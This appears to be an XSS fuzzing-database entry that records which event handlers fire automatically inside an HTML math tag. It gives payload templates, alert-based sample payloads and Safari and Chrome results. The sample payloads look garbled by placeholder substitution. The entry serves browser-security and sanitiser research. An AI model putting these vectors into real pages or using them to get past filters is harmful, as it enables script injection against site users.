XSS vectors that execute automatically inside math

This vector shows which events fire without user interaction inside a math tag.

Created by: hackvertor

Created on: 4/17/2024, 6:33:17 PM

Updated on: 7/14/2024, 10:33:58 AM

Vector type: XSS

Template used:
<math><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>
<math><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>

Sample payloads

<math><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></math>
<math><img->onerror ="alert('img->onerror->')"></img->onerror></math>

Fuzz results

Safari 17.4.1 Unknown Unknown
Found 1 result
Data
img->onerror
Chrome 124.0.0.0 Unknown Unknown
Found 1 result
Data
img->onerror